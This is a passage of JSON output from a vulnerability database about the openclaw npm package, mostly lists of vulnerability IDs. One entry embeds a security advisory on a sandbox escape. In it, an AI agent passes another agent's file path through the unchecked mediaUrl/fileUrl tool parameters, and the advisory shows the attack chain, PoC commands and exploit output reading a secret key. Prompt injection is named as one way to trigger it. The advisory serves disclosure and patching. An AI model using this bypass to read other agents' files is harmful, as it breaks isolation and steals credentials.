                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35637",
                "GHSA-vfg3-pqpq-93m4"
            ],
            "risk_score": 3.3,
            "exploitability": "0.5",
            "weighted_severity": "6.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cyj6-zyuh-qug6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91841?format=api",
            "vulnerability_id": "VCID-d3qp-5wm9-aqfp",
            "summary": "OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n\n**Description**:\n### Summary\nA path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `[\"media\", \"path\", \"filePath\"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root.\n\n### Details\nThe vulnerability exists in two files within the messaging pipeline:\n\n**1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:**\n\nIn `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate:\n\n```typescript\n// Line 212\nconst mediaKeys: Array<\"media\" | \"path\" | \"filePath\"> = [\"media\", \"path\", \"filePath\"];\n```\n\nThe `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`.\n\n**2. 
Dropped `mediaLocalRoots` in `handlePluginAction`:**\n\nIn `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context:\n\n```typescript\n// Lines 684-697\nconst handled = await dispatchChannelMessageAction({\n    channel,\n    action,\n    cfg,\n    params,\n    accountId: accountId ?? undefined,\n    requesterSenderId: input.requesterSenderId ?? undefined,\n    sessionKey: input.sessionKey,\n    sessionId: input.sessionId,\n    agentId,\n    gateway,\n    toolContext: input.toolContext,\n    dryRun,\n    // mediaLocalRoots is MISSING here\n});\n```\n\nDespite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces.\n\n**Attack chain:**\n1. A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: \"~/.openclaw/workspace/agent-b/secret.txt\" }`\n2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist)\n3. `handlePluginAction` dispatches without `mediaLocalRoots`\n4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**`\n5. Agent-B's secret file content is read and sent as a channel attachment\n\n### PoC\n\n**Prerequisites:**\n- Docker installed\n- OpenClaw Docker image built (`openclaw-gateway:latest`)\n\n**Steps:**\n\n1. Start the vulnerable gateway container:\n\n```bash\ncd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n2. Run the exploit:\n\n```bash\npython3 poc_exploit.py\n```\n\n3. 
The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully.\n\n4. Run the control experiment to confirm sandbox works for checked keys:\n\n```bash\npython3 control-sandbox_enforced.py\n```\n\n### Log of Evidence\n\n**Exploit output:**\n```\n=== CVE-2026-27522 Variant: Sandbox Media Root Bypass ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running exploit script with Bun...\n\n[VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams!\n  Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a\n  mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt\n  args after normalization: {\"mediaUrl\":\"/root/.openclaw/workspace/agent-b/secret_key.txt\"}\n[EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef\n\n=== EXPLOIT SUCCESSFUL ===\nAgent-A read Agent-B's secret file via mediaUrl, bypassing sandbox.\n\n[+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement\n```\n\n**Control experiment output:**\n```\n=== Control Experiment: Sandbox Enforcement for 'media' Key ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running control script with Bun...\n\n[SAFE] normalizeSandboxMediaParams blocked 'media' key as expected!\n  Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt\n\n=== CONTROL EXPERIMENT PASSED ===\nThe 'media' parameter IS correctly checked by sandbox enforcement.\nOnly unchecked keys (mediaUrl, fileUrl) bypass the sandbox.\n\n[+] CONTROL PASSED: 'media' key is correctly enforced by sandbox\n```\n\n### Impact\nThis is a **sandbox escape** vulnerability. 
An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. This includes:\n- API keys and secrets stored in other agents' sandboxes\n- Session data and conversation logs\n- Configuration files with sensitive credentials\n- Any file within the `~/.openclaw/` directory tree\n\nThis completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14 (current latest at the time of the original report)\n- **Patched versions**: <None> (as of the original report; the note at the top of this advisory gives OpenClaw 2026.3.24 as the fixed release)\n\n### Severity\n- **Severity**: High\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### Weaknesses\n- **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. 
|\n| [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. |",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35668",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17041",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17002",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00053",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17037",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35668"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35668",
                    "reference_id": "CVE-2026-35668",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35668"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hr5v-j9h9-xjhg",
                    "reference_id": "GHSA-hr5v-j9h9-xjhg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hr5v-j9h9-xjhg"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters",
                    "reference_id": "openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
